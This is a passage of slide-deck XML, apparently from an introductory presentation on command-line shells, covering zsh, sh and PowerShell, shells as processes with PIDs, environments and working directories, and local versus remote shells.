              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732020" y="2468880"/>
            <a:ext cx="3909060" cy="617220"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 8889"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0" name="Google Shape;140;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="2551176"/>
            <a:ext cx="10972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100"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>zsh</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="2777490"/>
            <a:ext cx="3566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Bash's cousin, default on macOS since 2019.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732020" y="3188970"/>
            <a:ext cx="3909060" cy="617220"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 8889"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3" name="Google Shape;143;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="3271266"/>
            <a:ext cx="10972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100"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="3497580"/>
            <a:ext cx="3566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original, minimal POSIX shell. Scripts often target this for portability.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732020" y="3909060"/>
            <a:ext cx="3909060" cy="617220"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 8889"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46" name="Google Shape;146;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="3991356"/>
            <a:ext cx="109728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100"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Google Shape;147;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="4217670"/>
            <a:ext cx="356616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Windows' modern shell. Works with objects, not just text.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p18"/>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What is a shell?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p18"/>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154" name="Shape 154"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;155;p19"/>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A SHELL IS A PROCESS</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Google Shape;156;p19"/>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Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>A shell is a process. It lives somewhere.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1131570"/>
            <a:ext cx="81610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000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Opening a terminal launches a real, running program on a real machine, just like any other process.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1645920"/>
            <a:ext cx="3909060" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 5333"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59" name="Google Shape;159;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="1817370"/>
            <a:ext cx="411480" cy="411480"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3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60" name="Google Shape;160;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="705002" y="1870862"/>
            <a:ext cx="304496" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165860" y="1769364"/>
            <a:ext cx="30861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A PID</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165860" y="2023110"/>
            <a:ext cx="308610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Every shell is a numbered process, just like any other program on the system.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732020" y="1645920"/>
            <a:ext cx="3909060" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 5333"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4" name="Google Shape;164;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="1817370"/>
            <a:ext cx="411480" cy="411480"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3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65" name="Google Shape;165;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956962" y="1870862"/>
            <a:ext cx="304496" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5417820" y="1769364"/>
            <a:ext cx="30861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A parent</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5417820" y="2023110"/>
            <a:ext cx="308610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Something launched it: your terminal app, or (as we'll see) sshd.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="2846070"/>
            <a:ext cx="3909060" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 5333"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69" name="Google Shape;169;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="3017520"/>
            <a:ext cx="411480" cy="411480"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3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70" name="Google Shape;170;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="705002" y="3071012"/>
            <a:ext cx="304496" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165860" y="2969514"/>
            <a:ext cx="30861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An environment</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165860" y="3223260"/>
            <a:ext cx="308610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Variables like PATH and HOME travel with it, inherited from its parent.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732020" y="2846070"/>
            <a:ext cx="3909060" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 5333"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4" name="Google Shape;174;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="3017520"/>
            <a:ext cx="411480" cy="411480"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3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75" name="Google Shape;175;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956962" y="3071012"/>
            <a:ext cx="304496" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Google Shape;176;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5417820" y="2969514"/>
            <a:ext cx="30861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A working directory</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5417820" y="3223260"/>
            <a:ext cx="308610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It always "is" somewhere in the filesystem, tracked as part of its state.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="4046220"/>
            <a:ext cx="3909060" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 5333"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79" name="Google Shape;179;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="4217670"/>
            <a:ext cx="411480" cy="411480"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3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80" name="Google Shape;180;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="705002" y="4271162"/>
            <a:ext cx="304496" cy="304496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165860" y="4169664"/>
            <a:ext cx="30861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A terminal attachment</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165860" y="4423410"/>
            <a:ext cx="3086100" cy="5829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Its input/output are wired to a terminal device, real or virtual (a PTY).</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p19"/>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A shell is a process</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;184;p19"/>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9" name="Shape 189"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Google Shape;190;p20"/>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TWO PLACES A SHELL CAN LIVE</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Google Shape;191;p20"/>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Local shell vs. remote shell</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48006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3" name="Google Shape;193;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1611630"/>
            <a:ext cx="480060" cy="48006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194" name="Google Shape;194;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="748208" y="1674038"/>
            <a:ext cx="355244" cy="355244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303020" y="1680210"/>
            <a:ext cx="29832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300"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1300" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Local shell</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1300" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2228850"/>
            <a:ext cx="353187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Your terminal app (Terminal.app, Windows Terminal, GNOME Terminal) creates a pseudo-terminal, then launches a shell process attached to it. The shell runs on your machine, using your machine's CPU and files.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Google Shape;197;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3874770"/>
            <a:ext cx="353187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Close the terminal, and that shell process dies with it.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
